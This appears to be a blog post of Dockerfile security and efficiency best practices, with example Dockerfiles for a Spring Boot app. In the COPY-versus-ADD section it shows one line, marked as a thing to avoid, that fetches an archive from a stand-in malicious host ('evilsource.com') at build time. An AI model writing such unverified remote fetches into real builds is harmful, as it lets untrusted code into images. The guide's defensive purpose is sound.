Write secure and efficient Dockerfiles

This post covers some best practices for building secure and efficient Docker images. It is not an exhaustive list, but it covers enough ground to write reasonably secure and efficient Dockerfiles.

Multi-stage builds

Multi-stage builds allow you to drastically reduce the size of your final image, without struggling to reduce the number of intermediate layers and files.

Here is an example of building a Spring Boot Maven project:

FROM openjdk:8-jdk-alpine as build

WORKDIR /workspace/app

COPY mvnw .
COPY .mvn .mvn
COPY pom.xml .
COPY src src

RUN ./mvnw install
# ----------------------
FROM openjdk:8-jdk-alpine

RUN addgroup -S app && adduser -S app -G app
USER app:app

COPY --from=build /workspace/app/target/hello-world.jar /

ENTRYPOINT ["java","-jar","/hello-world.jar"]

This example first builds the Maven project in one stage, then copies only the needed artifact into the final Docker image.
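To try it out, build and run the image as usual (the tag here is just an example):

docker build -t hello-world .
docker run --rm hello-world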

Leverage build cache

When building an image, Docker steps through the instructions in your Dockerfile, executing each in the order specified. As each instruction is examined, Docker looks for an existing image in its cache that it can reuse, rather than creating a new (duplicate) image.

So be sure to put the instructions that change most often at the bottom of the Dockerfile:

Do not do this:

COPY target/hello-world.jar .
# apk update re-runs every time the jar above changes, because the cache is invalidated
RUN apk update

Do this instead:

RUN apk update
COPY target/hello-world.jar .

Reduce the number of layers

Try to reduce the number of layers in your image by minimizing the number of separate RUN instructions in your Dockerfile, consolidating multiple commands into a single RUN line.

So instead of:

RUN apk update
RUN apk add curl

Do:

RUN apk update && \
    apk add curl

Use COPY instead of ADD

Although ADD and COPY are functionally similar, COPY is generally preferred because it is more transparent: ADD can point to a remote URL like http://evilsource.com that is fetched at build time (and it also auto-extracts local tar archives), whereas COPY only uses local files, in other words resources you control and have checked.
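For instance, compare the two (app.tar.gz and the URL are placeholders for any remote resource you do not control):

# avoid: fetches a remote, unverified resource at build time
ADD http://evilsource.com/app.tar.gz /opt/
# prefer: only copies files from the local build context
COPY app.tar.gz /opt/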

Avoid copying all files from the current folder

Even if it’s convenient, try to avoid doing this:

COPY . .

Instead, copy files and folders one at a time:

COPY mvnw .
COPY .mvn .mvn
COPY pom.xml .
COPY src src

The problem with copying the whole current folder is that developers may have left credentials in it, like a .credentials file used for development, which then end up in the Docker image. And even if you delete the file in a later Docker instruction, it remains in the earlier layer, and tools like dive can inspect each layer of the Docker image.
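As an illustration (the file name is hypothetical), the following does not remove the secret from the image, it only hides it in the final layer:

# .credentials is baked into the layer created by COPY
COPY . .
# this creates a new layer; the previous layer still contains the file
RUN rm .credentials

Anyone can then recover it by inspecting the layers, for example with dive my-image:latest.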

Verify binary checksum when possible

If you need to download a binary, be sure to verify its checksum, when one is provided, to ensure the file was not corrupted during download or modified by a malicious third party:

# using dive as an example
RUN curl -L -o dive_0.9.2_linux_amd64.deb https://github.com/wagoodman/dive/releases/download/v0.9.2/dive_0.9.2_linux_amd64.deb && \
    curl -L -o checksums.txt https://github.com/wagoodman/dive/releases/download/v0.9.2/dive_0.9.2_checksums.txt && \
    echo "$(cat checksums.txt | grep deb | awk '{ print $1 }') dive_0.9.2_linux_amd64.deb" | sha256sum -c
# this displays "dive_0.9.2_linux_amd64.deb: OK" and returns 0 if the checksum matches
# otherwise sha256sum fails (e.g. "FAILED" or a formatting error) and returns a non-zero code, thus stopping the docker build

Do not upgrade your system packages

This might be a bit of a stretch, but the reasoning is the following: you want to pin the versions of your software dependencies, and if you run apt-get upgrade you effectively upgrade them all to the latest available version.

If you do upgrade, and you are also using the latest tag for the base image, you amplify the unpredictability of your dependency tree.

What you want to do instead is pin the base image version and only run apt/apk update.
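A minimal sketch of that approach (the version numbers shown are hypothetical; pin the ones you have actually tested):

# pin the base image instead of using latest
FROM alpine:3.12
# update the package index, then install pinned package versions
RUN apk update && \
    apk add curl=7.69.1-r1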

Use non-root user

Root in a container is the same root as on the host machine, only restricted by the Docker daemon configuration. No matter the limitations, if an actor breaks out of the container, they may still find a way to get full access to the host.

Create a user instead:

RUN addgroup -S bios && adduser -S bios -G bios
USER bios:bios
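You can check the effective user at runtime (my-image is a hypothetical tag; whoami is available in Alpine-based images via busybox):

docker run --rm --entrypoint whoami my-image
# prints "bios" instead of "root"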

Here’s one example of why it matters to have a non-root user even if the container is isolated.

Use Cloud Native Buildpacks

Buildpacks transform your application source code to images that can run on any cloud. Paketo Buildpacks provide language runtime support for applications. They leverage the Cloud Native Buildpacks framework to make image builds easy, performant, and secure.

See https://paketo.io/.

If you are using Spring Boot 2.3+, you can use its plugin to build the image with Maven or Gradle:

# with Maven
./mvnw spring-boot:build-image
# with Gradle
./gradlew bootBuildImage

It uses the local docker daemon (which therefore must be installed) but doesn’t require a Dockerfile.

The image is built using Cloud Native Buildpacks, where the default builder is optimized for a Spring Boot application (you can customize it, but the defaults are useful). The image is layered efficiently, as in the examples above. It also uses the Cloud Foundry memory calculator to size the JVM at runtime based on the container resources available.
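By default the image is named after the Maven artifactId and version, so for the example above you could run it like this (the 512m limit is just an example):

docker run --rm -m 512m -p 8080:8080 hello-world:0.0.1-SNAPSHOT
# the memory calculator sizes the JVM according to the 512m memory limit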

Resources